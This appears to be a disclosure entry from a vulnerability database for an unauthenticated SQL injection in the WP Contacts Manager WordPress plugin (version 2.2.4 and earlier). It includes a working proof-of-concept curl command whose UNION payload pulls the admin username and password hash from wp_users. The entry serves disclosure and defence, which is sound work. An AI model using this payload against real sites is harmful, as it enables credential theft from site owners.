WordPress Plugin Vulnerabilities

WP Contacts Manager <= 2.2.4 - Unauthenticated SQLi

Description

The plugin fails to properly sanitize user supplied POST data before it is being interpolated in an SQL statement and then executed, leading to an SQL injection vulnerability.

Proof of Concept

curl 'http://127.0.0.1:8080/wp-admin/admin-ajax.php?action=WP_Contacts_Manager_call&type=get-contact' \
    --data '{"id":"1\u0027 UNION ALL SELECT 1,(SELECT user_login FROM wp_users WHERE ID = 1),(SELECT user_pass FROM wp_users WHERE ID = 1),4,5,6,7,8,9,0,1,2; -- "}'

Affects Plugins

References

Classification

Type
SQLI
OWASP top 10
CWE

Miscellaneous

Original Researcher
cydave
Submitter
cydave
Submitter website
Submitter twitter
Verified
Yes

Timeline

Publicly Published
2022-05-02 (about 2 years ago)
Added
2022-05-02 (about 2 years ago)
Last Updated
2022-05-02 (about 2 years ago)

Other